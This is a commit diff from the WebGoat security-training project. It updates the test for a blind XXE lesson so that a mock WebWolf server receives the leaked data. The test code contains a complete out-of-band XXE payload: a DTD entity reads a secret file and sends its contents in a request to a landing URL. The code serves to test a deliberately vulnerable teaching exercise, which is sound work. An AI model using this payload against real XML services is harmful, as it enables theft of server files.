Updated XXE lesson so it also uses WebWolf

2017-10-07 13:46:34 +02:00
parent 94caba7eb1
commit 8a982dedb5
13 changed files with 180 additions and 100 deletions
--- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
+++ b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
@ -1,8 +1,11 @@
 package org.owasp.webgoat.plugin;

-import com.google.common.io.Files;
+import com.github.tomakehurst.wiremock.client.WireMock;
+import com.github.tomakehurst.wiremock.junit.WireMockRule;
+import com.github.tomakehurst.wiremock.verification.LoggedRequest;
 import org.hamcrest.CoreMatchers;
 import org.junit.Before;
+import org.junit.Rule;
 import org.junit.Test;
 import org.junit.runner.RunWith;
 import org.owasp.webgoat.plugins.LessonTest;
@ -14,7 +17,9 @@ import org.springframework.test.web.servlet.result.MockMvcResultHandlers;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;

 import java.io.File;
+import java.util.List;

+import static com.github.tomakehurst.wiremock.client.WireMock.*;
 import static org.assertj.core.api.Assertions.assertThat;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
@ -32,13 +37,14 @@ public class BlindSendFileAssignmentTest extends LessonTest {
    @Value("${webgoat.user.directory}")
    private String webGoatHomeDirectory;

+    @Rule
+    public WireMockRule webwolfServer = new WireMockRule(8081);
+
    @Before
    public void setup() throws Exception {
        XXE xxe = new XXE();
        when(webSession.getCurrentLesson()).thenReturn(xxe);
        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        File logFile = new File(webGoatHomeDirectory, "/XXE/log" + webSession.getUserName() + ".txt");
-        if (logFile.exists()) logFile.delete();
        when(webSession.getUserName()).thenReturn("unit-test");
    }

@ -65,26 +71,39 @@ public class BlindSendFileAssignmentTest extends LessonTest {

    @Test
    public void solve() throws Exception {
-        File file = new File(webGoatHomeDirectory, "XXE/attack.dtd");
+        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
        String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
-                "<!ENTITY % file SYSTEM \"file:///" + webGoatHomeDirectory + "/XXE/secret.txt\">\n" +
-                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:" + localPort + "/WebGoat/XXE/ping?text=%file;'>\">\n" +
+                "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
+                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>\">\n" +
                "%all;";
-        Files.write(dtd.getBytes(), file);
-        String xml = "<?xml version=\"1.0\"?>\n" +
-                "<!DOCTYPE root [\n" +
-                "<!ENTITY % remote SYSTEM \"file://" + file.getAbsolutePath() + "\">\n" +
-                "%remote;\n" +
-                "]>\n" +
-                "<comment>\n" +
-                "  <text>test&send;</text>\n" +
-                "</comment>";
+        webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
+                .willReturn(aResponse()
+                        .withStatus(200)
+                        .withBody(dtd)));
+        webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
+        String xml = "<?xml version=\"1.0\"?>" +
+                "<!DOCTYPE comment [" +
+                "<!ENTITY % remote SYSTEM \"http://localhost:8081/files/test.dtd\">" +
+                "%remote;" +
+                "]>" +
+                "<comment><text>test&send;</text></comment>";
+
+        //Call with XXE injection
        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                .content(xml))
                .andDo(MockMvcResultHandlers.print())
                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))))
-                .andExpect(jsonPath("$.output", CoreMatchers.containsString("WebGoat 8 rocks...")));
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
+
+        List<LoggedRequest> requests = findAll(getRequestedFor(urlMatching("/landing.*")));
+        assertThat(requests.size()).isEqualTo(1);
+        String text = requests.get(0).getQueryParams().get("text").firstValue();
+
+        //Call with retrieved text
+        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
+                .content("<comment><text>" + text + "</text></comment>"))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
    }

 }